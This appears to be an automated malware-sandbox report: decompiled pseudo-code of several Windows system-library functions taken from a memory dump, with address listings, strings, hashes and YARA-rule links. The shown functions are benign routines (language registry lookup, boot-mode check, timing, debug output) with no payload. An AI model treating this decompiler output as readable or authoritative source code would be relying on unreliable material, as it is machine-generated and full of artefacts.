                                                          0x0343e63e
                                                          0x03495503
                                                          0x03495503
                                                          0x0343e64c
                                                          0x0343e64c
                                                          0x0343e651
                                                          0x00000000
                                                          0x00000000
                                                          0x0343e661
                                                          0x0343e665
                                                          0x0349542a
                                                          0x0343e715
                                                          0x0343e71a
                                                          0x0343e71c
                                                          0x0343e720
                                                          0x0343e720
                                                          0x0343e727
                                                          0x0343e736
                                                          0x0343e736
                                                          0x0343e743
                                                          0x0343e743
                                                          0x0343e673
                                                          0x0343e678
                                                          0x0343e67d
                                                          0x0343e682
                                                          0x0343e685
                                                          0x0343e692
                                                          0x0343e69b
                                                          0x0343e6a3
                                                          0x0343e6ad
                                                          0x0343e6b1
                                                          0x0343e6b2
                                                          0x0343e6bb
                                                          0x0343e6bf
                                                          0x0343e6c0
                                                          0x0343e6c8
                                                          0x0343e6cc
                                                          0x0343e6d5
                                                          0x0343e6d9
                                                          0x00000000
                                                          0x00000000
                                                          0x0343e6e5
                                                          0x0343e6ea
                                                          0x0343e6f9
                                                          0x0343e70b
                                                          0x0343e70f
                                                          0x03495439
                                                          0x0349545e
                                                          0x0349545e
                                                          0x00000000
                                                          0x0349545e
                                                          0x0349543b
                                                          0x0349543e
                                                          0x03495440
                                                          0x03495445
                                                          0x03495472
                                                          0x03495475
                                                          0x0349548d
                                                          0x03495493
                                                          0x034954a9
                                                          0x00000000
                                                          0x00000000
                                                          0x034954ab
                                                          0x034954b4
                                                          0x034954bc
                                                          0x034954c8
                                                          0x034954de
                                                          0x034954fb
                                                          0x034954e0
                                                          0x034954e6
                                                          0x034954eb
                                                          0x034954eb
                                                          0x034954de
                                                          0x00000000
                                                          0x034954bc
                                                          0x03495477
                                                          0x0349547a
                                                          0x03495480
                                                          0x03495483
                                                          0x03495486
                                                          0x0349548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0349548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03495447
                                                          0x03495447
                                                          0x03495447
                                                          0x03495447
                                                          0x0349544e
                                                          0x00000000
                                                          0x00000000
                                                          0x03495450
                                                          0x03495452
                                                          0x03495455
                                                          0x0349545a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0349545c
                                                          0x0349546a
                                                          0x0349546d
                                                          0x0349546f
                                                          0x00000000
                                                          0x0349546f
                                                          0x0343e70f

                                                          Strings
                                                          • InstallLanguageFallback, xrefs: 0343E6DB
                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0343E68C
                                                          • @, xrefs: 0343E6C0
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                          • API String ID: 0-1757540487
                                                          • Opcode ID: 434d1209aa3244aefd6047b038cdc768d5fcd069db94755729d09baf11640128
                                                          • Instruction ID: c2e579e3d595b17bef06317f352ee2f62086b31cb7de2797f77070fce9670a73
                                                          • Opcode Fuzzy Hash: 434d1209aa3244aefd6047b038cdc768d5fcd069db94755729d09baf11640128
                                                          • Instruction Fuzzy Hash: 2A51ED765093059BDB11DF26C440BABB7E8AF89654F18096FF995EF300F730D90487AA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E034B51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x35105f0);
				E0348D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0344EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E034B53CA(0);
						return E0348D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0347F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03453690(1, _t117, 0x3411810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0347AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03454620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0347AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E034B500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03479860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                          0x034b51be
                                                          0x034b51c3
                                                          0x034b51c8
                                                          0x034b51cd
                                                          0x034b51d0
                                                          0x034b51d3
                                                          0x034b51d8
                                                          0x034b51db
                                                          0x034b51de
                                                          0x034b51e0
                                                          0x034b51e3
                                                          0x034b51e6
                                                          0x034b51e8
                                                          0x034b5342
                                                          0x034b5351
                                                          0x034b5356
                                                          0x034b535a
                                                          0x034b5360
                                                          0x034b5363
                                                          0x034b5366
                                                          0x034b5369
                                                          0x034b5369
                                                          0x034b536b
                                                          0x034b536b
                                                          0x034b5370
                                                          0x034b53a3
                                                          0x034b53a4
                                                          0x034b53a6
                                                          0x034b53ab
                                                          0x034b53ab
                                                          0x034b53ae
                                                          0x034b53ae
                                                          0x034b53b5
                                                          0x034b53bf
                                                          0x034b53bf
                                                          0x034b5375
                                                          0x034b5396
                                                          0x034b53a0
                                                          0x034b53a0
                                                          0x00000000
                                                          0x034b5396
                                                          0x034b5377
                                                          0x034b5379
                                                          0x034b537f
                                                          0x034b538c
                                                          0x034b5390
                                                          0x00000000
                                                          0x034b5390
                                                          0x034b51ee
                                                          0x034b51f1
                                                          0x034b5301
                                                          0x034b5310
                                                          0x034b5315
                                                          0x034b5318
                                                          0x034b531b
                                                          0x034b5320
                                                          0x034b532e
                                                          0x034b5331
                                                          0x00000000
                                                          0x034b5331
                                                          0x034b5328
                                                          0x034b5329
                                                          0x00000000
                                                          0x034b5329
                                                          0x034b51fa
                                                          0x034b5235
                                                          0x034b5236
                                                          0x034b5239
                                                          0x034b523f
                                                          0x034b5240
                                                          0x034b5241
                                                          0x034b5242
                                                          0x034b5246
                                                          0x034b5247
                                                          0x034b524e
                                                          0x034b5251
                                                          0x034b5267
                                                          0x034b5269
                                                          0x034b526e
                                                          0x034b527d
                                                          0x034b527e
                                                          0x034b5281
                                                          0x034b5282
                                                          0x034b5287
                                                          0x034b5288
                                                          0x034b528a
                                                          0x034b528f
                                                          0x034b5294
                                                          0x00000000
                                                          0x00000000
                                                          0x034b529a
                                                          0x034b529c
                                                          0x034b529e
                                                          0x034b529e
                                                          0x034b52a4
                                                          0x034b52b0
                                                          0x00000000
                                                          0x00000000
                                                          0x034b52ba
                                                          0x034b52bc
                                                          0x034b52bc
                                                          0x034b52d4
                                                          0x034b52d9
                                                          0x034b52dc
                                                          0x034b52e1
                                                          0x00000000
                                                          0x00000000
                                                          0x034b52e7
                                                          0x034b52f4
                                                          0x00000000
                                                          0x034b52f4
                                                          0x034b5270
                                                          0x00000000
                                                          0x034b5270
                                                          0x034b51fc
                                                          0x034b51fd
                                                          0x034b5202
                                                          0x034b5203
                                                          0x034b5205
                                                          0x034b520a
                                                          0x034b520f
                                                          0x00000000
                                                          0x00000000
                                                          0x034b521b
                                                          0x034b5226
                                                          0x034b522b
                                                          0x034b521d
                                                          0x034b521d
                                                          0x034b5222
                                                          0x034b5222
                                                          0x034b522d
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: 248f8cde0152dbab47004ac519731a509e0fa90c6b735c02f6c4567df8f4c3c8
                                                          • Instruction ID: 700fe88ad0f67691d1f701905ebf6e8daba20e3563de2aa369c376a1fb2efaba
                                                          • Opcode Fuzzy Hash: 248f8cde0152dbab47004ac519731a509e0fa90c6b735c02f6c4567df8f4c3c8
                                                          • Instruction Fuzzy Hash: 25516CB1E007089FDB24DFA98980AAEF7B8FB49700F14406EE559EF351D7719941CB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0345B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 76%
                                                          			E0345B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x352d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03457D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03508CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03479E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0347B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0347CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03457D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03508F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0347AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3528628; // 0x0
								_v68 = _t77;
								_t78 =  *0x352862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3528628; // 0x0
							_t116 =  *0x352862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                          0x0345b94c
                                                          0x0345b956
                                                          0x0345b95c
                                                          0x0345b95e
                                                          0x0345b964
                                                          0x0345b969
                                                          0x0345b96d
                                                          0x0345b96d
                                                          0x0345b970
                                                          0x0345b974
                                                          0x0345b97a
                                                          0x0345badf
                                                          0x0345badf
                                                          0x0345bae2
                                                          0x0345bae4
                                                          0x0345bae6
                                                          0x0345baf0
                                                          0x034a2cb8
                                                          0x0345baf6
                                                          0x0345baf6
                                                          0x0345baf6
                                                          0x0345bafd
                                                          0x0345bb1f
                                                          0x0345bb1f
                                                          0x0345baff
                                                          0x0345bb00
                                                          0x0345bb00
                                                          0x0345bb03
                                                          0x0345bb03
                                                          0x0345bacb
                                                          0x0345bacf
                                                          0x0345bad0
                                                          0x0345bad1
                                                          0x0345badc
                                                          0x0345badc
                                                          0x0345b980
                                                          0x0345b980
                                                          0x0345b988
                                                          0x0345b98b
                                                          0x0345b98d
                                                          0x0345b990
                                                          0x0345b993
                                                          0x0345b999
                                                          0x0345b99b
                                                          0x0345b9a1
                                                          0x0345b9a5
                                                          0x0345b9aa
                                                          0x0345b9b0
                                                          0x0345b9bb
                                                          0x0345b9c0
                                                          0x0345b9c3
                                                          0x0345b9ca
                                                          0x0345b9cc
                                                          0x0345b9cf
                                                          0x0345b9d3
                                                          0x0345b9d7
                                                          0x0345ba94
                                                          0x0345ba94
                                                          0x0345ba98
                                                          0x0345baa3
                                                          0x034a2ccb
                                                          0x0345baa9
                                                          0x0345baa9
                                                          0x0345baa9
                                                          0x0345bab1
                                                          0x034a2cd5
                                                          0x034a2cdd
                                                          0x034a2cdd
                                                          0x0345babb
                                                          0x0345babc
                                                          0x0345bac2
                                                          0x0345bac3
                                                          0x0345bac3
                                                          0x0345bac6
                                                          0x00000000
                                                          0x0345b9dd
                                                          0x0345b9dd
                                                          0x0345b9e7
                                                          0x0345b9e7
                                                          0x0345b9ec
                                                          0x0345b9ec
                                                          0x0345b9f1
                                                          0x0345b9f5
                                                          0x0345b9fa
                                                          0x0345ba00
                                                          0x0345ba0c
                                                          0x0345ba10
                                                          0x0345ba10
                                                          0x0345ba12
                                                          0x0345ba18
                                                          0x00000000
                                                          0x00000000
                                                          0x0345bb26
                                                          0x0345bb26
                                                          0x0345ba1e
                                                          0x0345ba1e
                                                          0x0345ba23
                                                          0x0345ba25
                                                          0x0345ba2c
                                                          0x0345ba30
                                                          0x0345ba35
                                                          0x0345ba35
                                                          0x0345ba41
                                                          0x0345ba46
                                                          0x0345ba4c
                                                          0x0345ba50
                                                          0x0345ba54
                                                          0x0345ba6a
                                                          0x0345ba6e
                                                          0x0345ba70
                                                          0x0345ba74
                                                          0x0345ba78
                                                          0x0345ba7a
                                                          0x0345ba7c
                                                          0x0345ba8e
                                                          0x0345ba90
                                                          0x0345ba92
                                                          0x0345bb14
                                                          0x0345bb14
                                                          0x0345bb16
                                                          0x0345bb16
                                                          0x00000000
                                                          0x0345ba7c
                                                          0x0345bb0a
                                                          0x0345bb0d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0345bb0f

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0345B9A5
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 885266447-0
                                                          • Opcode ID: 05c2c0fef59e82cdeb0c24f5fc784ff50ea915b8258a0f294ee2ed85bfe2f3ed
                                                          • Instruction ID: 52ae6264fe9e7ac45adfa5e1963c426f2c69a6e4258a0763a83a0123b19cbd97
                                                          • Opcode Fuzzy Hash: 05c2c0fef59e82cdeb0c24f5fc784ff50ea915b8258a0f294ee2ed85bfe2f3ed
                                                          • Instruction Fuzzy Hash: 54514571A08741CFC720DF29C48092BBBE9FB88600F18896EF9958B356D771EC45CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E0343B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x350f7a8);
				E0348D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0348D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0347D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0347F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0348DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0347B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0347B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0347E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0347A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                          0x0343b171
                                                          0x0343b171
                                                          0x0343b171
                                                          0x0343b171
                                                          0x0343b171
                                                          0x0343b176
                                                          0x0343b17b
                                                          0x0343b180
                                                          0x0343b186
                                                          0x0343b18f
                                                          0x0343b198
                                                          0x0343b1a4
                                                          0x0343b1aa
                                                          0x03494802
                                                          0x03494802
                                                          0x03494805
                                                          0x0349480c
                                                          0x0349480e
                                                          0x0343b1d1
                                                          0x0343b1d3
                                                          0x0343b1de
                                                          0x0343b1de
                                                          0x03494817
                                                          0x0349481e
                                                          0x03494820
                                                          0x03494822
                                                          0x03494822
                                                          0x03494824
                                                          0x03494824
                                                          0x0349482a
                                                          0x00000000
                                                          0x00000000
                                                          0x03494835
                                                          0x0349483a
                                                          0x0349483d
                                                          0x0349483f
                                                          0x03494842
                                                          0x03494842
                                                          0x03494842
                                                          0x03494846
                                                          0x0349484c
                                                          0x0349484e
                                                          0x03494851
                                                          0x03494851
                                                          0x03494853
                                                          0x03494854
                                                          0x03494854
                                                          0x03494858
                                                          0x0349485a
                                                          0x0349485a
                                                          0x0349485d
                                                          0x0349485f
                                                          0x03494861
                                                          0x03494861
                                                          0x03494866
                                                          0x0349486b
                                                          0x0349486e
                                                          0x03494871
                                                          0x03494876
                                                          0x03494876
                                                          0x03494878
                                                          0x0349487b
                                                          0x03494884
                                                          0x03494884
